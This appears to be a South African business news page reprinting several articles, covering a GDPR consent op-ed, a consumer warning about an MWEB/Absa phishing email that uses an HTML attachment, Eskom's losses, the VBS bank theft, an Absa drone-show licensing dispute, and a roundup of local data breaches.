By Giovanni Buttarelli for The Washington Post 

First came the scaremongering. Then came the strong-arming. After being contested in arguably the biggest lobbying exercise in the history of the European Union, the General Data Protection Regulation became fully applicable at the end of May.

Since its passage, there have been great efforts at compliance, which regulators recognize. At the same time, unfortunately, consumers have felt nudged or bullied by companies into agreeing to business as usual. This would appear to violate the spirit, if not the letter, of the new law.

The GDPR aims to redress the startling imbalance of power between big tech and the consumer, giving people more control over their data and making big companies accountable for what they do with it. It replaces the 1995 Data Protection Directive, which required national legislation in each of the 28 E.U. countries in order to be implemented. And it offers people and businesses a single rulebook for the biggest data privacy questions. Tech titans now have a single point of contact instead of 28.

The new regulation, like the old directive, requires all personal data processing to be “lawful and fair.” To process data lawfully, companies need to identify the most appropriate basis for doing so. The most common method is to obtain the freely given and informed consent of the person to whom the data relates. A business can also have a “legitimate interest” to use data in the service of its aims as a business, as long as it doesn’t unduly impinge on the rights and interests of the individual. Take, for example, a pizza shop that processes your personal information, such as your home address, in order to deliver your order. It may be considered to have a legitimate interest to maintain your details for a reasonable period of time afterward in order to send you information about its services. It isn’t violating your rights, just pursing its business interests. What the pizza shop cannot do is then offer its clients’ data to the juice shop next door without going back and requesting consent.

A third aspect of lawfully processing data pertains to contracts between a company and client. When you purchase an item online, for example, you enter into a contract. But in order for the business to fulfill that contract and send you your goods, you must offer credit card details and a delivery address. In this scenario, the business may also legitimately store your data, depending on the terms of that limited business-client relationship.

But under the GDPR, a contract cannot be used to obtain consent. Some major companies seem to be relying on take-it-or-leave-it contracts to justify their sweeping data practices. Witness the hundreds of messages telling us we cannot continue to use a service unless we agree to the data use policy. We’ve all faced the pop-up window that gives us the option of clicking a brightly colored button to simply accept the terms, with the “manage settings” or “read more” section often greyed-out. One of the big questions is the extent to which a company can justify collecting and using massive amounts of information in order to offer a “free” service.

Under E.U. law, a contractual term may be unfair if it “causes a significant imbalance in the parties’ rights and obligations arising under the contract that are to the detriment of the consumer.” The E.U. is seeking to prevent people from being cajoled into “consenting” to unfair contracts and accepting surveillance in exchange for a service. What’s more, a company is generally prohibited to process, without the “explicit consent” of the individual, sensitive types of information that may reveal race or political, religious, genetic and biometric data.

Indeed, regulators are being asked to determine whether disclosing so much data is even necessary for the provision of services — whether it is ecommerce, search or social media. One key principle to remember is that asking for an individual’s consent should be regarded as an unusual request, given that asking for consent often signals that a party wants to do something with personal data that the individual may not be comfortable with or might not reasonably expect. Thus, it should be a duty of customer care for a company to check back with users or patrons honestly, transparently and respectfully. As the Facebook/Cambridge Analytica scandal revealed, allowing an outside company to collect personal data was not the type of service that users would have reasonably expected. Clearly, abuse has become the norm. The aim of the EU data protection agency that I lead is to stop it.

Independent E.U. enforcement authorities — at least one in each E.U. member state — are already investigating 30 cases of such alleged violations, including those lodged by the activist group NOYB (“none of your business”). The public will see the first results before the end of the year. Regulators will use the full range of their enforcement powers to address abuses, including issuing fines.

The GDPR is not perfect, but it passed into law with an extraordinary consensus across the political spectrum, belying the increasingly fractious politics of our times. As of June, there were 126 countries around the world with modern data protection laws broadly modeled on the European approach. This month, Brazil is next. And it will the biggest country to date to adopt such laws. It is likely to be followed by Pakistan and India, both of which recently published draft laws.

But if the latest effort is a reliable precedent, data protection reform comes around every two decades or so — several lifetimes in terms of the pace of technological change. We still need to finish the job with the ePrivacy Regulation still under negotiation, which would stop companies snooping on private communications and require — again — genuine consent to use metadata about who you talk to as well as when and where.

I am nevertheless already thinking about the post-GDPR future: a manifesto for the effective de-bureaucratizing and safeguarding of peoples’ digital selves. It would include a consensus among developers, companies and governments on the ethics of the underlying decisions in the application of digital technology. Devices and programming would be geared by default to safeguard people’s privacy and freedom. Today’s overcentralized Internet would be de-concentrated, as advocated by Tim Berners-Lee, who first invented the Internet, with a fairer allocation of the digital dividend and with the control of information handed back to individuals from big tech and the state.

This is a long-term project. But nothing could be more urgent as the digital world develops ever more rapidly.

Source: MyBroadband

MWEB and Absa clients have been targeted in a new e-mail phishing attack, where they are asked to open an attachment aimed at stealing their private information.

The email asks users to open an HTML attachment, which in turn opens a form in a browser which steals the victim’s personal details.

In the past, executable keyloggers were attached to emails to steal account information from victims.

However, most security services now block users from opening an attached executable file, as most of these files are malicious.

Scammers are now using HTML pages as attachments, where users are asked to provide their personal details in what appears to be a legitimate website.

In these scams, users are encouraged to open the attached email file, which opens in a browser and requests their username and password for a service.

This information is then sent to the criminal’s email address using a basic PHP script.

MWEB and Absa scam email
This is the method used in the latest email scam which is targeting MWEB and Absa clients.

The email, which claims to come from MWEB – but is sent from “info@mailsynk.co.za” – tells users that their “invoices and/or receipts and statement that you requested attached to this email”.

The attachment is the phishing page, which in this case uses the domain “jehovalchristofficeinternatona.co.za” to host the scripts.

Without looking at the HTML code, there are many warning signs that this is a scam email:

  • The email does not come from MWEB or Absa. It should be noted that an email which comes from an @mweb.co.za or @absa.co.za does not automatically mean it is authentic.
  • The email is poorly structured and contains poor grammar.
  • There is no personalisation in the email, with a user’s name or account details.
  • It mentions a PDF file, but the attachment is a .htm file.
  • Users are asked to provide their personal details to view a file – a clear sign it is a phishing attack.

By Penwell Dlamini for Sowetan Live; BusinessTech

Gauteng residents may have to wait for some time before clear word comes through on what should happen to the failed e-tolling system in the province.

Gauteng premier David Makhura tried unsuccessfully to explain to the legislature when the controversial system would be scrapped.

DA provincial leader John Moody asked Makhura when the gantries on Gauteng highways will be switched off and if those who have paid their e-toll bills will be refunded.

In his reply, Makhura said the matter is with national government and the ANC in the province would continue its campaigns for the scrapping of e-tolling.

A recent article in BusinessTech said that in an interview with Talk Radio 702’s Karima Brown, the deputy chairperson of the ANC in Gauteng, Panyaza Lesufi, avoided the question of how Gauteng’s roads will be funded and maintained going forward, instead stating that the province first needs to “let go” of the current system.

The ANC had previously stated that the controversial e-tolling system should be scrapped.

“The e-toll matter has now been referred to national government. The president [Cyril Ramaphosa] was there when we made call that e-tolls in this province …must be scrapped. We made that point at the ANC conference. We did not say the e-tolls are scrapped. [The issue of e-tolls] is at national government, which is now responsible for this matter.

“We as the ANC are going lead a campaign [against e-tolls]. There is no contradiction between the ANC taking up [national government]. There is no contradiction in that. We have been doing that all the time…I will lead the march to the Union Buildings. There is no contradiction in that. It will not be the first march to the Union Buildings. We are going to continue to lead in ensuring that the e-tolls become a matter of yesterday,” Makhura said.

At their recent provincial conference, Gauteng ANC members reiterated their position calling for the scrapping of e-tolls.

But the EFF is rejecting the ANC’s statement, saying the ruling party is raising the issue simply to appease voters.

“It is now going to be elections, you are starting again with this thing of yours with e-tolls. Leave the e-tolls alone. You have failed to scrap it. It is like your mother party [the ANC]; every time we go to elections, they start changing their tone with the land issue…All I am saying is that please do not fool us and try to tell us that you will do something about e-tolls. People of Gauteng must never pay e-tolls and we are not going to pay them,” said EFF MPL Ntobeng Ntobeng.

Makhura could not give any indication when national government would make its final decision on what should be done with e-tolls.

By Annie Palmer for DailyMail 

Facebook will soon be able to notify you if Russian trolls are sliding into your DMs.

The social media giant is testing a new feature that will include additional information from unfamiliar contacts who have direct messaged you on Facebook Messenger, showing things like when the account was created and the country where their phone number is registered.

It marks Facebook’s latest effort to stave off the spread of fake news on its platform.

Should the feature become available to the public, it would help prevent users from receiving potentially malicious or spammy messages from unknown users.

“We are testing a way to provide people with more context on folks they may not have connected with previously,” Facebook Messenger spokesperson Dalya Browne told Motherboard.

“This is just a small test,” she adds.

By Sibongile Khumalo for Fin24

Eskom suffered a net loss of R2.3bn in 2018, compared with a R0.9bn profit the previous year, the state-owned power producer revealed at its financial results presentation on Monday.

CEO Phakamani Hadebe said the poor results were compounded by allegations of corruption and mismanagement, challenges of governance and negative investor sentiment.

The power utility said its net cash from operations declined from R45.8bn to R37.6bn, as it struggled with leadership and operational challenges.

Eskom Chair Jabu Mabuza also said there had been R19.6bn in irregular expenditure since 2012, with much of the irregular expenditure being reported in 2018.

“This was a result of us shaking the cupboard so hard that so many skeletons came tumbling down,” he said.

“The verification and cleaning up exercise resulted in a significant increase in the number of reported irregular expenditure in 2018 (from R3bn to R19.6bn), with many of the items reported arising in prior years. Where information was not readily available, alternative methods were used where practical to identify irregular expenditure,” the utility said.

The power utility admitted that its “transition towards financial and operational sustainability required resolute, tough and decisive leadership”.

Its liquidity remained a going concern, with a massive R4.2bn owed to it by municipalities.

“Eskom continues to face significant financial and liquidity challenges in the short term, mainly due to the high debt burden, low sales growth and increased finance costs”.

Eskom debt has increased from R387bn to R600bn withing four years, but steps have been taken by the board to boost investor confidence, Hadebe said.

“We have raised 22% to date of [the] R72bn borrowing requirement for 2018/19, and have a firm commitment to increase funding to 62% of the 2018/19 borrowing requirement.” He said growing investor appetite for Eskom bonds was a concern.

The power utility, which has been hit by leadership challenges, is battling a long-standing financial stability crisis, including a debt of R13.5bn owed to it by a number of municipalities.

In March, Moody’s downgraded Eskom’s credit ratings from B2 from B1, citing an absence of concrete plans to place its business on a sound financial footing. B2 is the fifth rung of sub-investment grade debt.

The current wage demands by unions are also adding to the firm’s financial woes, with labour unions currently discussing Eskom’s latest options of 7% and 7.5% increases, which were tabled after a round of bruising negotiations.

The firm initially offered no increases, citing its difficult financial position. Eskom and the unions were drawn to the negotiation table by Public Enterprises Minister Pravin Gordhan in a bid to avert a crippling strike by workers.

In June, the National Energy Regulator (Nersa) has approved R32.69bn for Eskom’s multi-year price determination Regulatory Clearing Account (RCA) applications – funds Eskom must recover due to an electricity shortfall or an escalation in operating costs.

Was Absa’s drone show illegal?

By Timothy Rangongo and Jay Caboz for Business Insider SA

Absa put on Africa’s first “drone firework” show in partnership with technology giant Intel above Johannesburg last Wednesday night, but it is not clear how it got permission to do so.

Questions have been raised about the event because neither Absa nor Intel seems to have a licence to operate drones, nor do they seem to have registered the 300-odd drones that were involved.

South Africa has strict licensing requirements for drones, in part to protect those beneath them.

Current rules require companies to have an air-service licence issued by the Air Service License Council (which resides at the Department of Transport) as well as a remote operator’s certificate (ROC) from the South African Civil Aviation Authority (CAA), responsible for regulating the civil aviation industry.

Drone operators must also have a Remote Pilot License (RPL), as they would be using the drones for commercial purposes, says technology lawyer at Michalsons, Lisa Emma-Iwuoha.

Strictly speaking, each of the 300 Absa drones should be individually licensed before they can take off, she says.

Such licensing is a tedious process that has taken local companies years to organise, according to Jono O’Connell, owner of Timeslice, a licensed drone company in the film industry in Cape Town.

“Many of us were contacted only a month ago to quote on this project and we all said it could not happen in such a short space in time,” O’Connell tells Business Insider South Africa.

“I have waited nearly two years for one [letter of approval] and at best around eight months. I said organising a job like this within the time frame would be impossible.”

In response to the allegations that they were flying drones illegally over Johannesburg, Absa told Business Insider it had received the correct permission to use the airspace above two sites, Nasrec and the Johannesburg CBD, from the CAA in June.

But a CAA letter seen by Business Insider shows approval was granted on 5 July for safety and security procedures for a “once-off special event”.

The letter also mentions a company called NTSU Aviation Solutions, which Absa says was contracted to acquire permissions for the use of the airspace only.

To obtain such permission, a company must either have an Air Service License (ASL) or an operating certificate, according to aviation lawyer, Chris Christodoulou of Christodoulou & Mavrikis Inc.

One of NTSU’s co-founders, Sam Twala, confirmed to Business Insider that the company is not a drone operator, as it doesn’t have a certificate for operating drones.

Twala said he couldn’t comment on whether the company has an Air Service License, and referred us to the company website – which does not contain that information.

NTSU is not listed on the CAA’s organisations that currently hold ROC licenses.

Further investigation shows that the founders of NTSU are former employees at the regulatory body.

Twala worked in the remotely-piloted aircraft division at CAA while his co-founder, Dale McErlean, is a former flight inspector responsible for new drone company applications.

Drone company owners verified their former positions.

But Absa says all is above board and Intel was given “special permission” by the CAA.

“I really want to promote drones and what Absa is doing is fantastic. How can it be fair to fast-track one operation while dozens of others get left lying in limbo? The way this was done goes against the regulations we are strictly held to,” says O’Connell.

“We’re all happy to play by the rules. What’s good for the goose is good for the gander. Unfortunately what seems in this case is that is not what’s transpired,” says O’Connell.

Even the chairman of the council responsible for granting licences to fly drones in SA, Michael Mabasa was perplexed at the operation.

Debit order disputes on the rise

By Carin Smith for Fin24

Debit order disputes have increased significantly over the last three years, according to the Payments Association of South Africa (PASA).

Yet, it said recent investigations have shown that in the majority of cases, proof that debit orders were indeed authorised by consumers could be provided.

According to PASA, the increase in debit order disputes could mean that companies have bad practices in obtaining such debit order mandates, or that consumers are asking their banks to reverse actual valid debit orders.

Consumers could be doing this, because the reversal of such legitimate debit orders creates temporary cash flow relief for them. PASA emphasises however, that this kind of behaviour by consumers is not acceptable and has become a huge concern for the financial services industry.

As part of a project to reduce debit order disputes, banks are investigating ways to enhance their current dispute and prosecution processes.

Over the last few years PASA has been working with banks to address debit order abuse. Initiatives include – statistically identifying potential problematic companies, refining the minimum criteria for mandates, and managing a debit order abuse list which can result in “rogue companies” being excluded from the system.

Initiatives also include a process to investigate and issue fines or initiating forensic investigations and prosecution when companies do not have mandates or have mandates that do not conform to minimum requirements.

DebiCheck

One of the most pertinent, but longer-term solutions to curb debit order abuse remains the Authenticated Collections project that was started in 2013.

Now close to implementation, the project will deliver a new type of debit order, called DebiCheck. Currently there are 11 banks participating in DebiCheck. Through this new debit order system, a debit order will only be processed to a consumer’s account if the mandate for such a debit order has been electronically confirmed by the consumer.

This means that consumers will be aware of which DebiCheck debit orders will be processed to their accounts – and these debit orders will not be processed by the bank if they are outside the agreed conditions the consumer initially confirmed.

As a result, PASA foresees that the number of invalid debit orders being processed as well as the number of consumer disputes where valid mandates are in place will rapidly decline.

Improving safety and efficiency

Additionally, an interbank committee has been established and mandated to improve the safety and efficiency of debit orders. This is through including new ways to better identify existing users abusing the system, enhanced measures and support to ensure offenders are adequately investigated and prosecuted, and processes that will assist in curtailing improper consumer behaviour.

PASA says consumers continue to have the right to dispute or instruct their bank to reverse debit orders they have not agreed to, or which are processed outside the mandate they have given.

They should continue to be watchful when entering into contracts – verbally, in writing or electronically. PASA also encourages consumers to check their bank statements on a regular basis. Also, not to provide or confirm account information if they are not certain what exactly it will be used for.

The industry is currently involved in the prosecution of certain rogue collectors. PASA believes the new measures it is working on will significantly assist the authorities and improve the success of prosecution.

By Warren Thompson for Business Day 

The South African Reserve Bank painted a grim picture on Monday that suggests as much as 75% of VBS Mutual Bank’s assets may have been stolen by its executives and directors.

“It’s a travesty that the failure of management put so many depositors at risk,” said Bank governor Lesetja Kganyago, at a media conference on the curatorship of VBS.

“Institutions such as banks rely on the governance processes, but when it’s the people responsible for the bank that are the ones perpetrating the crime, no amount of regulation can prevent that,” he said.

VBS, which was formed as a building society in the former Venda homeland, came to national prominence in 2016 when it gave former president Jacob Zuma a R7.8m loan after he was ordered to repay the state for upgrades made to his Nkandla home.

The bank’s failure may yet have grave consequences for municipalities in some of the poorest parts of the country, which stand to lose almost all of the R1.6bn they deposited with VBS, increasing the risk of budget shortfalls and violent protests that could result from a lack of service delivery.

Curator Anoosh Rooplal’s timing of the action he instituted on Friday to recover more than R1.5bn from the bank’s largest shareholder, Vele Investments, as well as from the bank’s executives and directors, was done to prevent further “dissipation of assets”.

But the amount of money stolen relative to the bank’s total assets is harder to establish, partly because the bank deliberately misled the regulator and also due to problems with the quality of its audit, which led the bank to withdraw its 2017 financial results.

Rooplal did not rule out seeking damages from the bank’s external auditor, KPMG, and the bank’s internal auditor, PwC, when the forensic report is completed towards the end of August.

According to the bank’s last available annual financial statements to end-March 2016, the bank had total assets of just more than R1bn.

By the end of January 2018, according to data provided by VBS to the Reserve Bank, the bank held total assets of R2bn, meaning it had doubled its balance sheet in the space of two years.

When asked what, if any, part of VBS’s loan book was performing, the curator said that the home loan mortgage book of about R400m was behaving consistent with credit extended under arms-length credit agreements.

The performance of the vehicle finance book was mixed, with the curator noting a deterioration in the credit quality in the months leading up to the intervention by the Reserve Bank.

Based on a balance sheet of about R2bn, and with the curator seeking to recover R1.5bn from the “perpetrators of the fraudulent scheme”, it seems possible that as much as 75% of the bank’s balance sheet has disappeared.

Retail deposits

But there was relief for small depositors, with the Reserve Bank announcing that it has obtained a guarantee of R330m from the Treasury should it fall short in recovering the money owed to them.

The Bank announced last week that retail deposits, which include individuals, burial societies and stokvels, would be guaranteed to a maximum of R100,000 per customer.

This means that 97% of all depositors at the bank will be refunded their entire savings.

Source: The Citizen 

R1 666 to rent an office chair for a month may seem a bit steep, but that’s exactly what the bankrupt state insurer is charging.

Are you sitting down for this?

The Road Accident Fund has pushed through a contract for the rental of 300 office chairs for almost half a million rand a month, in what amounts to R1 666 per chair, the Sunday Times has reported.

Another furniture contract with the same company, Gxakwes Projects, for R60-million, did not go ahead. Both contracts did not have a tendering process.

The fund is technically insolvent, with contingent liabilities totalling almost R190 billion, hence its attempts to make money by renting out office furniture.

The RAF takes R1.93 of every litre of South African petrol sold.

This has not helped them avoid a R34.7-million loss last year.

While the fund admits that renting furniture was “not the best option”, they say they need to do so “to settle claims immediately, resulting in a creditors book of about R8 billion.”

Transport Minister Blade Nzimande dissolved the fund’s board this week, declaring it dysfunctional and affected by “serious divisions”.

Gxakwes Projects, the company involved in the furniture contracts, has been red flagged by the National Treasury after a similar deal was entered into with Eskom, who wanted R24 million for the purchase of 9 217 chairs.

An inspection by the Treasury found that only 500 chairs were needed.

The attempt to secure a five year, R60-million contract without a tender was thwarted by some board members concerned that the “process is fraught with legal concerns.”

Reports of the goings on at the struggling state insurer are a bit like a car crash. As horrific as it is, you can’t look away.

By Tehillah Niselow for Fin24 

Liberty Holdings customers received SMSs on Saturday alerting them that personal information related to their insurance policies could have been stolen by an external party.

The Information Regulator, which has asked for information about the Liberty breach, is clearly concerned about the increasing number of cyber attacks affecting personal data in South Africa.

“Without a fully functional Information Regulator, these breaches will continue to occur without sanctions provided for in the Protection of Personal Information Act (POPIA),” said chairperson Advocate Pansy Tlakula.

Tlakula urged “the powers that be to assist it in fast tracking its operationalisation”.

According to corporate law firm Michalsons, certain limited sections of POPIA have already been implemented. However, the bulk of the legislation will only commence at a later date, to be proclaimed by the president. As there is a one-year grace period, the POPIA deadline might only be set for the end of 2019 or in 2020.

In the meantime, South Africans are coming under heightened attack from cyber criminals and hackers.

Andrew Chester, MD of Ukuvuma Security, told Fin24 that affected clients or users should immediately alert their banks and cellphone provider. They should also undertake a credit check as well as a Google search to determine whether their personal information is in the public domain.

Liberty email hack

In SMSs to clients on Saturday, financial services company Liberty informed them that its email repository had been breached by a third party trying to demand a “ransom” in exchange for the data.

Liberty has not revealed much about the breach, citing a police investigation. CEO David Munro confirmed that Liberty’s insurance clients were the only ones affected, and that none of its other business had been compromised.

The company said none of its clients have been impacted financially, and that individuals will be personally advised if their information has been affected.

ViewFines licence details

In May the Hawks, the State Security Agency and the Information Regulator said they would probe the breach of personal records of 943 000 South African drivers, allegedly from online traffic fine website ViewFines.

The information reportedly contained the names, identity numbers and email addresses of South African drivers stored on the ViewFines website in plaintext.

The ViewFines website is owned by Aggregated Payment Systems. News24 reported that its operations manager confirmed the company was “implementing security measures immediately” to improve the website after being informed of the breach.

The source of the data was located by Troy Hunt, an Australian security researcher and creator of the free service Have I Been Pwned, which checks whether an individual’s information has been compromised.

Facebook scandal

While Facebook founder and CEO Mark Zuckerberg had to face angry lawmakers in the US and European Union, it was reported that the data breach involving the UK political consultancy affected almost 60 000 South African users.

In May, the Information Commissioner’s Office of the United Kingdom (which regulates Facebook outside the US and Canada) advised the Information Regulator of South Africa that over 87 million people had been affected worldwide.

However, no evidence could be found of South Africans having been targeted, as the majority of users involved were in the US.

Master Deed’s data breach “biggest” digital security threat in SA

Hunt was once again instrumental in revealing what was known as the “biggest” data breach in South African history, together with iAfrikan CEO Tefo Mohapi in October 2017.

Over 60 million South Africans’ personal data, from ID numbers to company directorships, was believed to have been affected.

The information was traced to Jigsaw Holdings, a holding company for several real estate firms including Realty1, ERA and Aida. The information reportedly came from credit bureau agencies, and was used to vet potential clients.

The information trove was found not to have been hacked, as it was stored in an easily accessible manner on an open web server.

Ster-Kinekor’s database compromised

Movie theatre chain Ster-Kinekor was responsible for up to 7 million South Africans falling victim to a data leak in March 2017.

Fin24 reported that Durban developer Matt Cavanagh announced he had discovered a flaw in Ster-Kinekor’s booking website, and that he had reported it to the company.

There were between 6 and 7 million users in the database. Of those, 1.6 million people had email addresses linked to them on the movie theatre chain’s database.

Platinum:

         

Gold:


Silver:

           

Follow us on social media: 

               

View our magazine archives: 

                       


My Office News Ⓒ 2017 - Designed by A Collective


SUBSCRIBE TO OUR NEWSLETTER
Top